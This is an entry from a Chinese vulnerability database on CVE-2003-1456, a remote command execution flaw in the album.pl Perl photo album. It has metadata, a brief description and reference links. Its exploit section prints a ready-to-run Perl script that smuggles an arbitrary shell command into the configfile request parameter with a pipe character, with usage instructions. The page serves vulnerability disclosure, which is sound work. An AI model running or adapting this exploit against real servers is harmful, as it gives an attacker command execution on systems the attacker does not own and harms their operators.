Mike Bobbitt album.pl远程任意命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107290 漏洞类型 输入验证
发布时间 2003-04-26 更新时间 2003-12-31
CVE编号 CVE-2003-1456 CNNVD-ID CNNVD-200312-074
漏洞平台 CGI CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22545
https://cxsecurity.com/issue/WLB-2007100091
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-074
|漏洞详情
album.pl是一款流行的WEB图片相册应用程序。album.pl在当使用更改的配置文件时不正确处理用户提交的请求,远程攻击者可以利用这个漏洞以WEB权限执行任意命令。目前没有详细漏洞细节提供。
|漏洞EXP
source: http://www.securityfocus.com/bid/7444/info

A remote command execution vulnerability has been reported for Album.pl. The vulnerability reportedly exists when alternate configuration files are used.

The precise technical details of this vulnerability are currently unknown. This BID will be updated as further information is available.

#!/usr/bin/perl -w

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
$| = 1;

if (!$ARGV[0] && !$ARGV[1])
{
	print "\n Usage: perl $0 <album_uri> \"<command>\" \n\n";
	exit;
}

$command="$ARGV[0]?configfile=$ARGV[1]|";

my $conn=LWP::UserAgent->new();
my $data=HTTP::Request->new(GET => $command);
my $result=$conn->request($data);
if ($result->is_error())
{
	printf " %s\n", $result->status_line;
}
else
{
	print "Success: $result\n";
}
|参考资料

来源:BUGTRAQ
名称:20030426Album.plVulnerability-RemoteCommandExecution
链接:http://www.securityfocus.com/archive/1/319763
来源:perl.bobbitt.ca
链接:http://perl.bobbitt.ca/yabbse/index.php?board=2;action=display;threadid=720
来源:XF
名称:albumpl-command-execution(11878)
链接:http://xforce.iss.net/xforce/xfdb/11878
来源:BID
名称:7444
链接:http://www.securityfocus.com/bid/7444
来源:SREASON
名称:3270
链接:http://securityreason.com/securityalert/3270
来源:NSFOCUS
名称:5497
链接:http://www.nsfocus.net/vulndb/5497